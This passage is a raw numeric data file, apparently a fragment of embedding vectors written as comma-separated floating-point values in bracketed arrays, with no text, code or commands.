,-0.006472111,0.010892039,-0.0033450208,-0.017806152,-0.01842188,-0.0040659336,0.008430683,-0.012870026,0.026507933,0.06603415,-0.035394695,-0.0011829624,0.0090103755,0.0024926674,-0.028107556,0.03127487,-0.0020591863,-0.031286355,-0.0030958778,0.012461692,0.018280867,-0.009907281,-0.04346533,-0.014229422,0.008287947,-0.016743291,-0.003850793,0.00049999316,-0.016397303,-0.013225625,0.015479847,-0.00873301,-0.00018792921,-0.004605393,0.011511762,-0.0028647424,-0.015446093,0.029152784,-0.0026377162,0.02849091,0.0141561525,0.035556767,-0.01765816,0.008930426,0.0027522068,-0.01700225,0.028456457,-0.011708474,-0.032243688,-0.028389966,-0.030210722,0.007858428,0.010486582,0.008620686,-0.003920775,-0.009059695,-0.003788625,-0.020492874,0.114984,-0.015659554,-0.004595201,0.020817133,0.0012465334,-0.00891017,0.0030859776,0.018170921,0.0048580994,0.009655031,-0.0036941292,0.009777509,0.021656748,0.00445709,-0.00994591,-0.002425074,0.020279186,0.13209449,-0.016318433,0.011023379,0.012858462,-0.01077499,0.012540077,-0.0017763502,0.021214616,-0.06365381,0.0038589225,-0.05698671,-0.0010241709,-0.0022770464,-0.04975633,0.016868578,0.007883849,0.007578718,-0.0069366763,0.028746838,-0.012214612,0.0036137495,-0.019619577,-0.014929655,0.008114141,-0.0109548,-0.00812705,-0.0037684035,0.0025117786,0.00428299,-0.028226413,0.006776524,-0.013791822,0.005003589,-0.01001227,-0.017407967,0.029779917,-0.008505357,0.010919209,-0.0060920347,0.0013146935,-0.01181361,-0.009804801,0.024677554,-0.014962133,0.021877766,-0.02383636,0.025016384,-0.023418259,-0.0035061094,-0.017855477,-0.0041881995,-0.00084848027,0.0064649223,0.016128859,0.02372561,-0.020378225,-0.017413646,0.034854885,-0.0096955625,-0.004557774,0.007019988,0.02274718,-0.0019697954,0.01381387,0.013145058,-0.0014237064,0.0079467185,0.014535249,0.03198403,-0.013807815,0.014453109,0.029215885,-0.016830089,0.0071553,-0.0010610144,0.0024653405,-0.0048812204,0.0050843447,0.03479529,0.012708462,-0.01264175,0.007834669,-0.012727767,0.0041310876,0.028903197,-0.006962543,-0.0061069503,-0.017384274,-0.001636061,-0.004236109,-0.034969747,-0.020516768,-0.004027655,-0.0009513271,0.010690295,-0.015728286,0.03130604,-0.008385367,-0.013874946,-0.0011255839,0.004043068,-0.013998659,0.007871133,0.004532907,-0.0064757396,-0.000016012005,-0.0009917669,0.0072170543,-0.0005337474,0.0073186266,0.030823488,0.0058294097,-0.013081339,-0.012566529,-0.0023126712,0.007337367,0.028723784,0.008238016,-0.019113112,0.030909237,-0.032114893,-0.025796335,-0.010089658,0.014465672,-0.002148981,-0.0026907898,0.021547051,-0.012489133,-0.008628396,0.0045097335,-0.007863467],[-0.00427156,0.0059717097,-0.011710204,-0.017154353,0.014538663,-0.021510089,0.010939136,0.019245453,-0.018565966,-0.020225823,0.012295925,0.025716482,0.0015161616,-0.021778097,-0.021291636,0.0065804967,0.014514862,-0.0011424861,-0.0058452943,-0.0054494236,0.009498859,-0.0028292993,0.010301978,-0.009993928,0.026969021,-0.0070144953,-0.019325588,0.013644259,0.0070283855,0.0025139183,-0.0057164896,0.037694745,0.014518467,0.010077761,0.011936355,-0.011254869,-0.002833752,-0.00099449,0.010077978,-0.0002512081,-0.0038153995,0.00228973,0.019641975,0.003535212,-0.020991769,-0.004220929,-0.01233966,-0.0033228032,-0.030470852,0.008561028,0.03718116,-0.0046916995,-0.022176716,-0.007699682,-0.0062182583,0.018638788,-0.0010095281,-0.02525644,0.0055114846,-0.0077300435,-0.014622766,0.0033619446,-0.0068853344,-0.024433965,-0.0027052367,-0.0076446207,-0.01359724,-0.025334917,-0.0022799352,-0.025457295,-0.0070323045,-0.005234513,-0.01021464,0.018900203,0.004663047,0.031515617,0.008375191,-0.020878451,-0.011494646,0.018674823,-0.0010955466,0.0007355838,-0.0035653203,0.004952561,0.013053186,0.009982334,-0.00097303523,-0.015926063,-0.01486395,-0.017230408,-0.0029814232,0.004523444,0.007259951,-0.0047519444,-0.018680295,0.011726267,0.0021183349,-0.004411364,-0.004604348,0.033787105,-0.011276558,-0.015326773,-0.010067448,0.013730721,0.014747188,-0.006980231,-0.006956642,-0.022987718,0.0022646203,-0.031025764,0.005871645,-0.004306973,0.00045251835,0.0018911016,0.017014952,-0.0067700963,0.0014938769,0.0011976623,-0.0014345434,0.0016751981,-0.009835734,0.034966126,0.014464538,-0.0032372226,-0.012859941,-0.013448065,-0.017811324,0.0021251298,0.0049209064,0.011787738,-0.005668741,0.000009612316,0.0012716841,-0.022172924,-0.01590171,0.0059889928,-0.00079366134,0.010006673,-0.0025031846,-0.009087032,0.013275018,-0.012199593,0.0127788205,0.001293969,0.014320373,0.003942281,-0.007139179,0.018051691,0.00841835,-0.0141799245,-0.008399808,0.0048757154,-0.014035368,-0.031741474,0.0014176882,0.023631502,0.0049567022,-0.030236349,-0.023203276,-0.0012929492,-0.0085141,0.006065059,0.025374532,-0.026320653,-0.004260278,-0.018470591,-0.009919236,0.0040101428,-0.024416123,0.014016535,0.01621738,0.024613246,0.011730623,0.009649775,0.011360973,0.026758686,-0.014526809,0.01271,-0.008116715,-0.017517587,0.025159705,-0.0142763425,-0.0067356597,0.0092114,0.006821885,0.023029137,0.006351768,-0.004784477,-0.020523325,-0.009626636,0.008243977,-0.032303914,-0.0071730227,-0.013109854,-0.009290062,-0.010455294,-0.009769104,0.0785467,-0.0037457764,-0.00057067553,-0.008450979,-0.007785458,0.0052205008,-0.025954887,-0.014066664,-0.03568452,-0.016001983,0.0007296695,0.00037231002,-0.009883369,0.016911909,-0.013024092,-0.015608217,0.0033726844,0.0017118035,-0.08110472,0.023237715,0.012439324,0.017415475,-0.009854047,-0.012092264,0.00071868714,0.0013566574,-0.033646017,-0.0058016838,-0.014248009,-0.0235823,-0.00020404633,0.023755092,-0.015118153,0.001805999,0.010538103,-0.020021204,-0.0020328334,-0.0006403487,-0.0018727662,0.00072527106,0.004848559,0.014117204,-0.019537311,0.016154103,0.006405151,0.03645443,0.036396988,-0.01418185,-0.015050588,-0.009974339,0.013443351,-0.026935684,0.012652392,0.021243988,-0.0035754268,-0.008277678,0.034135256,-0.007941468,-0.030409165,-0.016128974,-0.036314663,-0.013700439,0.008653029,0.0020278697,0.01070051,-0.00212221,0.032166425,0.03499438,0.004094966,0.013610709,-0.039949805,-0.014056995,-0.0386981,-0.0031937195,-0.0015350129,-0.016219737,-0.0018149724,0.011254252,-0.003309625,0.0114376545,0.003797802,0.01176877,0.00056543754,0.0009503628,0.005270356,-0.013272957,-0.023476215,-0.007955423,0.013910675,-0.024117945,-0.0033045458,0.038953815,-0.007927627,-0.008187507,-0.003398685,0.023670742,-0.006644227,-0.023967443,-0.022020523,-0.028845374,-0.0029522409,0.0018305194,-0.020284817,0.006927622,-0.0090230005,0.031710766,0.0090367915,-0.00096245203,0.0066132,0.011360389,0.028737692,0.0005101144,0.024416212,-0.031969555,0.0041845944,-0.012566126,-0.020741837,0.0009298289,-0.0070633185,-0.005126783,-0.0027075205,-0.020708458,0.004725701,0.033112288,-0.022873325,0.02112343,-0.02231635,0.0061973543,0.004500112,0.0007387121,-0.0019047724,0.020064585,0.018666696,0.007372997,0.0021904886,0.011891081,0.01751619,0.010508707,0.041122936,-0.005688147,0.024066253,0.012230764,0.0048036524,-0.021041526,-0.00051842374,-0.0029720094,0.008000603,-0.004623086,0.0047110403,0.0010574156,-0.0028893796,0.011615443,0.02766266,0.017958198,0.006970519,-0.0011610657,-0.02392988,-0.022503398,-0.005221995,-0.0023112253,-0.029981377,0.0073875617,-0.01737017,0.016312193,-0.010124245,-0.020478738,-0.005502018,0.051714588,0.0018076143,-0.0059093526,-0.0021941052,-0.025246115,-0.026717477,0.025034575,0.0070102992,0.00022319915,-0.017930474,0.0017700497,-0.041340116,0.0006395013,-0.0014473058,-0.01782567,0.010282428,-0.01753693,-0.005914822,-0.018584134,-0.011366955,0.017779596,-0.012274349,-0.002750338,0.0041095405,0.02117827,0.023391603,-0.0042992886,0.003134429,-0.009023106,-0.012865563,0.0065701082,-0.0070268656,0.008118875,0.009017886,-0.035436638,0.009674023,0.015233958,0.0012243412,-0.009599321,-0.010609555,0.008649102,0.03325427,-0.011237552,-0.0017767332,-0.026847461,0.027467497,0.0034340862,-0.012123263,-0.019493219,0.014097415,-0.013364236,0.036162306,-0.025037264,0.014255641,0.0036897804,0.015266452,0.013143796,-0.05353391,0.02866335,0.026902078,0.02927166,0.02503087,-0.011134866,-0.0062855887,-0.005048264,0.037273306,-0.019783208,0.0027989778,-0.007826579,-0.009232902,0.00170274,-0.014515987,-0.025818171,0.008534994,-0.010517311,0.0014613189,-0.00021162914,-0.011365117,0.015808249,0.017879995,-0.006331989,0.001660423,-0.0073396405,0.0042482726,0.027964331,0.0044559175,-0.00085633,0.00652728,0.011698946,-0.01362856,-0.0038424837,0.019421626,-0.015905412,0.0025903953,0.033275984,0.027207961,0.008978563,0.0032519028,-0.013052648,-0.024606986,0.0021649236,-0.011726844,-0.015171479,-0.012131816,0.009013208,0.008753042,0.011243507,-0.008331094,0.007921599,0.02241225,-0.016505871,0.0029195705,0.031762704,-0.0065666684,-0.0037908813,-0.02356575,-0.019694908,-0.02348198,-0.0062025045,0.002568856,0.025050053,-0.008384559,0.03565542,0.0044911457,-0.029035864,0.011483901,-0.0047348686,-0.028246723,0.0074977386,0.015990915,0.003520683,0.017999187,0.0007026313,-0.03489934,0.00057057803,0.0057981145,-0.025005488,-0.009211047,0.037650265,0.026512748,0.021877915,0.007201957,0.016372714,-0.0032171556,0.013693244,0.026616154,0.027987847,0.0031860939,-0.031045275,-0.015713582,-0.005535738,-0.0054611205,-0.025527019,0.008273726,-0.0021828185,0.027118117,0.015736477,-0.011654231,-0.007509883,0.027548047,0.033873003,-0.029691383,0.016719442,-0.0065300525,-0.0065705897,0.04419748,0.020023929,0.032654144,-0.014907651,-0.019664928,-0.020824363,0.017426934,0.036698416,-0.00802494,0.009132192,-0.032510407,-0.001941569,-0.0028362744,0.014645023,-0.016778534,0.007284494,-0.029867146,-0.0025682638,-0.0064662364,-0.004358636,0.005482947,-0.010687211,0.0028689764,-0.010598708,0.0062353746,-0.03757789,0.011256279,0.0007483921,0.004479016,0.0051235356,-0.017681455,-0.02154666,-0.01464854,-0.015447675,0.015805451,-0.0082636,-0.0010874534,-0.0036717337,0.016786765,-0.013450386,-0.014145257,0.034187425,-0.00048776055,-0.015353578,0.009228588,0.024981426,0.00017078419,-0.0007516575,0.017703595,0.01566463,0.014009689,-0.009654942,-0.01099084,0.029623069,0.012402919,0.013473952,-0.00704029,0.00025222852,-0.004602868,0.008010095,0.0076736202,-0.006229627,0.0027215413,-0.0048163473,-0.0111009935,-0.026322126,-0.02414323,-0.0071357395,-0.018055785,0.0013974942,0.0026012072,-0.023182996,0.016612599,-0.0032408012,-0.013445606,-0.00844332,0.015737856,-0.020969937,-0.017771292,0.024833992,0.0031123427,-0.0031648942,-0.00489474,0.014679824,-0.019449783,-0.0005284956,0.020001097,0.023230083,-0.013825252,-0.012328439,0.008716253,0.000976274,0.007253069,-0.009452648,0.0028652747,0.013774462,0.010666016,0.016201252,0.0025867587,-0.030085891,-0.0061555183,-0.0027281332,-0.032430183,-0.0043122303,-0.026664086,0.01781339,-0.0036719046,-0.008982262,0.002425832,-0.008646909,-0.007843514,-0.010699133,0.0071121478,-0.07452466,-0.008970037,-0.012169616,0.02522345,0.008594266,0.035281096,0.010824864,0.0033891764,-0.007621144,-0.001412275,-0.0054027303,0.0005805579,-0.02655548,-0.019992242,0.011956393,-0.018487986,-0.034174208,-0.005316583,-0.01820503,-0.0067964154,-0.021591848,0.029904274,0.023636494,0.0017839823,-0.004487034,-0.004682388,-0.013695482,-0.01690102,-0.017935952,-0.03974844,-0.011824743,0.02021385,-0.028632617,0.015767245,-0.022645772,-0.0103688,-0.0074204104,-0.013570761,-0.0016329488,0.00014087933,-0.0037597162,-0.013509901,-0.005333319,0.01631266,-0.015266356,0.014256823,-0.033053394,0.0025521205,0.016819527,0.035124972,-0.0003467342,0.008355094,-0.012060684,0.0015903848,-0.011456688,0.008589448,0.0020008418,0.022180833,0.02278428,0.00019725664,0.0028660374,0.019294154,0.0016154705,-0.0014639852,-0.009412105,0.01840035,0.022811187,0.01977772,0.011221228,-0.0017098024,0.03161857,0.020297894,-0.019239552,-0.0006722828,0.016034558,0.004931976,-0.0007152694,-0.0007590499,-0.0019837788,0.021163411,-0.022764578,-0.01290548,0.0045346417,0.05175224,0.014862198,-0.0010798164,-0.00073713117,-0.00302597,0.015945883,0.02023166,-0.02330039,-0.013457117,-0.015490406,-0.019426519,-0.0074214763,-0.030409735,-0.015134506,-0.028139044,-0.025486689,0.014019107,0.020192653,0.00082853966,-0.03398899,0.0062124003,0.019105628,-0.0015773269,-0.025752256,-0.015202299,-0.0016506632,0.022419043,-0.0102864755,-0.0062568923,0.018944953,-0.0040609664,0.019995887,0.03447158,-0.013481669,-0.0047426303,-0.004693252,-0.016351739,0.010285466,0.009177003,0.015688796,0.017917266,-0.040295128,0.010198185,-0.014339442,0.005333722,0.0022968606,-0.011940213,0.028457632,-0.015091217,-0.016049603,-0.0017530452,-0.02979503,0.009536487,-0.00019130856,-0.04096433,-0.014624157,-0.005677768,0.022196254,-0.01807711,0.027414816,-0.009486672,0.03224974,0.023623511,0.013214149,0.017345535,0.0015994436,0.01605689,0.020551592,0.030166244,0.014163655,-0.019889161,0.009572585,0.020512262,-0.00890377,0.0042599095,-0.013934032,-0.019292036,-0.013109128,-0.045755133,0.012983607,-0.030514684,0.010822077,0.016122371,-0.014680044,0.025128186,-0.0058343196,0.008126044,-0.0012797735,-0.0005906317,0.013113232,-0.009714735,0.005425057,-0.04864039,-0.022742849,0.014446707,-0.006749905,0.026188027,-0.0044391467,-0.037475575,-0.023880621,-0.020290917,0.014055012,-0.016431639,0.010139078,0.011028924,-0.013205737,-0.008555003,0.0058264933,-0.0058953264,0.01383066,-0.01877419,-0.0051747025,-0.0058584437,-0.017076902,0.0071732644,0.017887589,-0.02305464,0.024263019,0.010322286,-0.0019223014,0.029978,0.008690262,0.004435472,0.0045829294,0.014647518,0.011359146,-0.020024603,0.017973755,-0.025455028,-0.023503525,0.026545968,0.0036977415,0.00047903537,-0.013248608,-0.023876088,-0.019173557,-0.015374681,0.014300931,-0.018493144,0.029159665,0.018249037,-0.0012996709,-0.0022467207,-0.0009990123,0.025789997,-0.0010057365,0.013589572,0.011006258,0.007811265,-0.023422634,-0.01734414,-0.0075934874,-0.013867217,0.007977931,0.018737534,0.004139714,0.0030627856,0.023397058,-0.016774116,-0.011333567,0.0041789655,-0.0010650229,0.007267795,0.014055632,0.009579535,0.0010889126,0.016477289,0.027730348,-0.01815052,-0.009214363,-0.0010395914,-0.0014754393,0.03571655,-0.039360467,0.0068280934,0.0042282403,-0.012143808,0.01322728,-0.01649,-0.0056663207,-0.022343287,-0.0049993936,-0.0046560373,0.005801648,0.022606011,-0.01483507,-0.016263422,0.003917918,0.012344646,-0.009606953,0.010818738,-0.009405943,0.0015192393,0.008506468,0.01984394,0.009184658,-0.009516932,-0.018830664,0.015817435,0.022886952,-0.004516982,0.01187653,0.0052288254,-0.01957755,0.01230092,-0.009215675,-0.028830146,-0.0036419039,-0.015332103,0.017079925,0.0032438766,-0.018102465,-0.035623338,-0.05710593,0.013664773,-0.022437042,-0.0026385759,0.010981983,0.0037678375,0.008245361,0.001923157,0.047203604,-0.009127477,0.007985718,-0.0018384964,-0.0014203498,-0.009833416,-0.013433309,-0.013881934,-0.012613968,-0.0007159987,0.010355401,0.015156833,0.0062814015,0.0028854322,0.0097712735,-0.0057520536,0.026232315,0.012798385,-0.000110410045,0.00722635,-0.03068972,0.010778269,-0.007927092,-0.012047206,-0.008496257,-0.010037992,-0.016228715,-0.008969252,-0.0032555729,0.010411639,-0.0073112957,-0.0057431557,-0.013584362,-0.018589396,-0.002398409,0.035113294,-0.016922152,-0.02598422,-0.0042166878,-0.0009878657,0.021376073,-0.003107816,0.03470133,-0.0057360716,-0.015523315,0.0036906255,-0.015644047,0.023649538,-0.008579643,0.017676955,0.01235031,0.032962143,-0.008848524,-0.008105049,0.015750032,0.0058492147,-0.012562465,0.004167558,-0.008194593,0.025629917,-0.002954764,-0.011920365,0.0057172375,-0.002867626,-0.013499269,-0.0052242735,-0.014292326,0.006477735,-0.009593357,-0.01571309,0.008042615,-0.019080944,-0.017447378,0.020562313,-0.020154437,0.011333538,-0.019911392,0.0040433137,0.004952278,-0.006131177,-0.00039477597,-0.0059566954,-0.0000032788669,-0.0004951133,0.009111787,0.0062498925,0.0061375224,0.020297477,0.011230826,0.005358543,-0.004379175,-0.010116184,0.0072099078,0.0065613715,-0.003662961,0.03678431,-0.0025799496,0.0012933254,0.0101723485,0.018915119,0.026915258,0.022950951,-0.018153122,0.001167027,0.011305727,0.0042111687,-0.008034286,0.010072886,0.0013213928,0.023484485,0.023667352,0.031161381,0.007808917,-0.0066968026,0.023870671,0.0018080046,-0.007512826,0.0066251056,0.0021463337,-0.007960049,-0.016515354,0.0165367,-0.0004373764,0.002143787,0.0036028412,-0.0072061196,0.0131432945,0.02920739,0.0123075275,-0.033551767,-0.01040272,-0.0027888347,-0.033298805,0.00524431,-0.0101101715,0.004336146,0.03971273,-0.008719935,0.013741737,-0.009114939,0.003907864,0.00891444,0.0031576254,0.014385865,0.016648062,0.03273497,0.006489694,-0.0016797469,-0.009334972,-0.003783051,0.02057462,-0.0018910031,0.010054578,-0.0014585581,-0.003917246,0.0124903,-0.018382788,0.003871348,-0.0029698943,-0.010081655,-0.0147292325,-0.014360911,-0.0039146016,0.030494867,-0.0075736335,0.034394007,-0.0048709163,-0.019539736,0.030264143,0.00086247746,0.00027133425,0.030386418,0.006224442,0.037715103,-0.0017990442,0.009336791,0.003568045,-0.006701489,-0.0094057135,-0.024768418,-0.010109335,-0.014119528,-0.005161601,-0.009192035,-0.012870626,-0.011060922,-0.012853947,0.039889842,-0.024522495,0.007560186,0.0073767225,-0.019051528,-0.018146444,0.027023893,0.0019108675,-0.00024119555,0.009950294,0.026636923,0.010925251,-0.0251203,0.0006416313,-0.0028989566,-0.026046284,-0.0048488365,-0.00048354405,-0.01230412,-0.022067618,-0.0038552345,-0.0132797295,-0.007855573,0.0075351615,-0.035080407,0.00602449,0.018764,0.0100024585,0.012834908,-0.0072050556,-0.008842333,0.007985977,0.014432292,-0.011928754,-0.009929271,0.029119492,-0.00884032,0.02976486,0.022789882,-0.023410339,0.005624525,-0.0039061257,0.023611026,-0.023079988,-0.0007677214,0.00575462,-0.0013338922,0.0064580925,-0.0087208785,-0.0024549242,0.027770784,-0.0005555935,-0.0031401066,0.021410337,0.036085747,-0.014912409,-0.017061444,0.0040186597,-0.009780402,-0.024350045,-0.008294677,-0.015849931,-0.022464992,0.003898135,-0.011133358,-0.014752373,-0.008559457,-0.0013371677,-0.006423328,-0.01828108,-0.008746345,0.005196731,0.008470378,0.05242836,-0.0065029087,-0.010294623,0.0030561124,0.004613665,0.0047169137,-0.002653225,0.008107459,-0.033848923,-0.004709715,0.0075513716,0.012740276,0.011956995,0.009482876,0.014834182,-0.00025287078,0.008784346,0.011460394,-0.023252381,-0.013038494,0.017909572,0.0061715227,-0.021773905,-0.005688949,0.0052033663,0.00710297,0.01955402,-0.006977076,-0.013022866,-0.011369342,-0.006914024,-0.00008653673,0.08654844,-0.0034853925,0.021587076,-0.0005648354,0.01929913,-0.017576305,0.0130447745,0.009803902,0.0020625857,-0.014085705,-0.043008935,-0.021824723,-0.015820969,-0.008878728,0.0021646535,-0.008348579,-0.004342157,0.004869131,0.0091641145,0.0058246953,-0.0048237694,-0.0033309269,-0.015902793,-0.0017248034,0.023087902,0.032309506,0.025111998,-0.0072389166,0.018144965,0.0023440917,-0.008344621,-0.012812078,0.025247106,0.009570676,-0.0065483446,0.012237606,0.015875628,-0.014970429,-0.0074138804,-0.0008328303,-0.0056781224,-0.012386467,0.033601593,0.034645982,-0.0072350437,-0.022377234,-0.0142975515,-0.0035342632,-0.006028075,-0.004107104,0.014056394,-0.014567141,-0.006589288,0.010366878,-0.021491768,0.015449236,-0.0015432881,0.008991718,0.025540996,0.00011351115,-0.0020186652,0.026541833,-0.0061157937,-0.026257344,-0.0012911363,-0.016502341,0.014213446,-0.010565476,0.01290534,-0.02851532,0.006179614,-0.006579334,0.008162677,0.0003638463,0.002193754,-0.002821028,0.017836219,-0.023201924,-0.00008030299,-0.042891387,-0.012201733,0.005335538,0.017101858,0.021469494,0.015466802,0.008305336,0.021451417,-0.0012590521,0.03539812,0.017886158,0.009300681,-0.016564045,-0.0035793392,0.044471666,0.006027274,0.024525722,-0.007328688,0.0035558178,-0.027518438,0.023959516,-0.012136932,-0.0007587737,0.029618014,-0.013536756,0.012292699,-0.015338797,-0.001607603,-0.020602914,-0.001049717,0.04456692,0.003699818,0.017406773,0.014492232,0.010493895,-0.0070361234,0.0030808053,0.0011139583,0.0077016475,0.0014734323,-0.006716998,-0.003829971,-0.009495465,-0.011374116,-0.0745106,0.002507249,0.14443894,0.008205505,0.006495524,0.043980874,-0.00020746487,0.00015724775,-0.16716875,0.002264408,0.012910206,0.0039874963,-0.0071142265,-0.016555447,0.0012453609,0.00013554761,0.003361609,-0.004271323,-0.0182747,-0.032084513,0.026130509,-0.018016726,0.0073463246,0.014406137,-0.00015381022,0.031616844,-0.020995531,-0.015594991,0.009316454,-0.0008901668,0.0018377565,-0.020336173,-0.0030940233,0.0029904486,0.008247797,0.00586537,-0.014129958,0.004439629,0.01671869,0.011891599,-0.028442,-0.005458511,0.028023006,0.00088068284,-0.017808205,-0.028945556,-0.13734373,0.008782995,0.0030274447,-0.04210652,0.024769058,-0.029139953,-0.021109229,0.007082278,0.009142051,-0.032144137,0.02415329,0.03892227,-0.00979024,-0.011607184,-0.005545598,0.011095792,0.008647251,0.005154515,0.005860324,-0.010917197,0.0145986155,-0.0011701934,-0.0053883176,-0.0028896153,-0.021526609,0.0011551376,-0.013582059,0.029337885,0.005508239,0.015221645,-0.010442597,0.010040853,-0.019473711,0.0048498064,-0.018930743,-0.013905902,0.014201401,-0.007011284,-0.0074382448,0.031278398,0.006665042,0.0023587025,-0.011563038,0.0080499025,-0.004854805,0.012390312,0.03292833,0.02094163,0.0028718798,0.0071120034,0.007579517,0.014340616,-0.013518475,0.022517,0.007240655,-0.006964215,-0.014465637,-0.026367685,-0.014357208,-0.0040122103,-0.005684791,-0.016358264,-0.010071773,0.010663379,0.014267475,-0.030314948,0.0037641174,-0.03122329,-0.008430263,0.0033170243,0.013586026,-0.010060439,0.016630119,-0.020934407,-0.001023506,0.0056328666,-0.021886025,0.0029088373,0.020272592,0.015887622,0.017416755,-0.0035160047,-0.011519535,-0.021514697,-0.00024382048,-0.015435769,-0.003085397,-0.011612536,0.011960497,0.012083226,0.02269594,-0.012977573,-0.0020218517,0.007036837,0.017731663,-0.0008566064,0.036779873,-0.010466095,-0.020472122,0.0005908101,0.0070607513,-0.016661633,-0.0038595414,0.008539337,-0.026176175,-0.005385654,-0.0068140887,-0.000061607396,-0.019277943,0.0011692551,-0.0041217273,-0.018821675,0.015104729,0.0049370728,-0.018965242,0.017976813,-0.00891498,-0.0072749127,0.0017546418,-0.030783035,-0.036424607,0.009002997,-0.019754086,-0.017976843,0.016731136,0.0015925771,-0.018518306,0.010601371,-0.02622086,0.02629695,-0.02186417,-0.0056371517,-0.006537876,0.00135676,-0.00022129288,0.010968322,-0.01692125,0.0084239915,-0.018411454,-0.010987854,-0.022208806,0.020229695,-0.007169747,0.012484584,0.0075318045,-0.012778592,0.04733867,-0.0023618706,0.032045826,0.0043414803,-0.003865546,0.014971436,-0.018370578,-0.015110056,0.0078840405,0.07455977,0.001762141,-0.015861282,0.013365556,0.016503213,-0.0014693646,0.022447638,-0.0028560844,-0.023270069,-0.017149247,0.012042362,0.0023979968,-0.005882685,0.025230572,-0.02587992,0.0079847975,0.013637299,0.004828306,-0.008778794,0.0061231214,0.0145505695,-0.010630863,-0.0061833393,0.039106164,-0.0044722143,0.00054394826,0.01562426,-0.01704274,0.011529163,-0.0061887936,-0.022015369,-0.020371018,-0.010000428,0.0029708247,-0.016427668,-0.023680303,-0.005110495,-0.005542277,0.011935302,-0.023609318,0.0067107384,0.010754591,-0.0035493902,-0.03368314,0.0006375191,-0.004403096,0.002228023,-0.0050229444,0.011339348,-0.013005995,-0.0012597704,0.029136185,0.008635919,-0.007868602,0.009344184,0.0032728175,0.006241824,0.0008270356,0.0076570613,0.003383351,0.025841882,-0.0104309805,-0.009166703,-0.013164749,0.00208104,0.012237564,0.009049797,0.006932739,-0.016710013,0.003792862,0.0029560407,0.010518366,-0.019659366,0.010095486,0.0031729613,0.009486265,-0.022157207,-0.014184282,-0.011403419,0.003086247,0.01321079,0.0070657604,0.015957212,-0.018559266,-0.0033381884,-0.030691877,-0.023741094,0.0399819,-0.025692986,0.0037980282,-0.004141413,0.005420691,0.06354818,0.00022163223,0.003291241,0.009351308,0.034383465,0.008628796,0.018183175,-0.002667239,0.015043597,0.018935101,-0.012061193,-0.010345039,-0.00914905,0.0012131744,-0.033238247,0.0049450034,0.012980892,-0.015049566,-0.00997153,-0.0067372816,0.0009645215,-0.030103356,-0.010874173,0.019879544,0.009471698,0.010650814,0.03515873,-0.004669514,-0.014127998,0.006843911,0.010161819,-0.011358636,0.045545954,-0.014097749,-0.0022760548,0.013777715,-0.038608767,0.025116937,-0.011071568,-0.0033038391,0.029936582,-0.01467517,-0.007563824,0.013717715,0.0013022164,0.024335895,0.009059927,-0.0024963983,-0.014664014,0.0033642058,0.010037218,0.018475203,-0.02120473,0.016947452,0.015778169,-0.019160468,-0.025871586,0.020588638,-0.014750507,-0.010147833,-0.0017813272,0.0063074906,0.009319486,0.03518285,-0.030910349,-0.0014641748,-0.034092262,-0.021662537,0.0056185527,0.015211871,-0.0075926427,-0.016404085,-0.023860695,0.019998558,0.028482888,-0.010193102,-0.0013667793,0.0036582355,-0.013374392,-0.016015358,0.00038824626,-0.004068965,0.0070268675,-0.011456272,-0.010941236,0.011595379,-0.013770307,-0.019352036,0.0067392276,0.011883006,-0.009853327,0.004438311,0.01644003,0.020678354,0.0005274067,0.042186372,-0.01819207,0.0145858945,0.0052506044,-0.0056677884,-0.017484834,0.004384382,-0.03204,-0.004018171,0.016728982,-0.0116314385,-0.00432837,0.02510435,0.0076977117,0.012147056,-0.044993553,-0.01849134,-0.013781448,-0.0014351744,0.0040100757,-0.016314575,-0.008137367,-0.008659916,-0.003016737,-0.028053196,-0.0074390927,-0.0015762727,-0.01903396,0.0058461376,-0.0070279064,0.021519314,0.015089983,-0.040845443,-0.009006945,0.008483194,-0.0040680766,-0.012778649,0.009977478,-0.0059575504,-0.006856784,0.024780206,-0.025719363,0.0007564998,0.019769939,0.033976212,0.042433456,0.017611325,0.002467838,-0.01120533,-0.031361368,-0.016598929,-0.04152945,0.010082695,-0.023626113,-0.034743674,-0.007961506,-0.0060936506,-0.0054593408,0.0021344435,0.014510626,0.034633905,-0.002079723,-0.012760343,0.003707411,-0.008505806,-0.0035651778,0.022846458,0.023023931,0.0042154477,0.011740853,0.0023017558,-0.015155434,-0.02620481,-0.008486383,0.008569716,-0.009335694,-0.0021580665,-0.01187245,0.008134292,0.012503535,0.054085415,0.02905004,0.0049768793,0.010317064,0.008483743,0.009645933,-0.009852322,0.026700674,-0.031708047,0.0052971835,-0.008734565,0.0010969056,0.024523666,0.0053758672,-0.019422157,0.0112398295,0.008180146,-0.014276818,-0.0051460858,0.0016042022,0.024075868,-0.0035032944,-0.031769495,-0.020857267,0.020640438,-0.0017344751,-0.010062933,-0.036184255,-0.0077933436,0.00003834606,-0.011455498,-0.0017306032,0.015538362,0.015482079,-0.00574229,0.0018916816,0.015564766,0.0022028526,-0.039999098,0.019870806,0.023547245,0.010571716,-0.0007888667,-0.013875346,-0.0077524344,0.008248555,0.002421202,0.01585691,0.0014004485,-0.002422963,0.018507848,-0.026623242,0.01868544,0.007398961,0.0131588075,-0.003509066,-0.016466903,-0.01614579,-0.00093042565,-0.03373363,-0.029944723,0.0011420995,-0.008044419,0.013049935,0.0016626156,0.018302077,-0.12825379,0.0058638235,-0.019180533,-0.0034942492,-0.01491464,-0.011064079,0.02034893,0.009069792,0.015935749,0.024604311,0.013746632,0.030571071,0.013367277,0.014392339,0.013812814,-0.0067385407,-0.009338028,-0.0080172075,-0.01896943,-0.005453102,0.027427323,-0.02214658,-0.007540129,0.00044868208,0.0072942097,-0.00028146326,0.0010488546,0.013299599,0.00009362057,0.00217061,-0.012353386,0.018055046,0.02295438,0.0022200746,0.014625042,0.013756838,0.016699295,0.01975488,-0.008112723,0.015242483,-0.007994133,-0.00048445354,0.00086364493,-0.00032295298,0.014107226,-0.007316242,-0.0013375753,0.025543578,0.027785238,0.008706372,-0.014396614,0.014579762,-0.0045101335,0.0056356783,0.009775366,-0.028105386,0.0030819867,-0.0063145827,0.004458111,-0.009845896,0.00003165102,0.02269731,-0.0020740896,-0.014634704,0.015369793,-0.016047947,-0.00016808796,-0.0012765947,-0.013296465,0.011841519,-0.0084827235,0.024614936,-0.011904107,0.00613826,-0.010572441,0.00038878128,0.011457835,-0.014554565,-0.011228242,0.015890663,-0.041532297,0.0025503112,-0.0023483718,0.0100011695,-0.010404946,-0.012023589,0.014425478,0.035699308,0.004917956,0.014170956,0.010935886,0.01008475,-0.009081421,-0.026470704,-0.009239819,0.015677381,-0.002495893,0.01370687,0.01874773,-0.0067450763,-0.0033476357,-0.007859071,0.006526854,-0.017986685,-0.10489056,-0.0042809285,0.009739924,-0.0038910252,-0.0036506683,-0.00801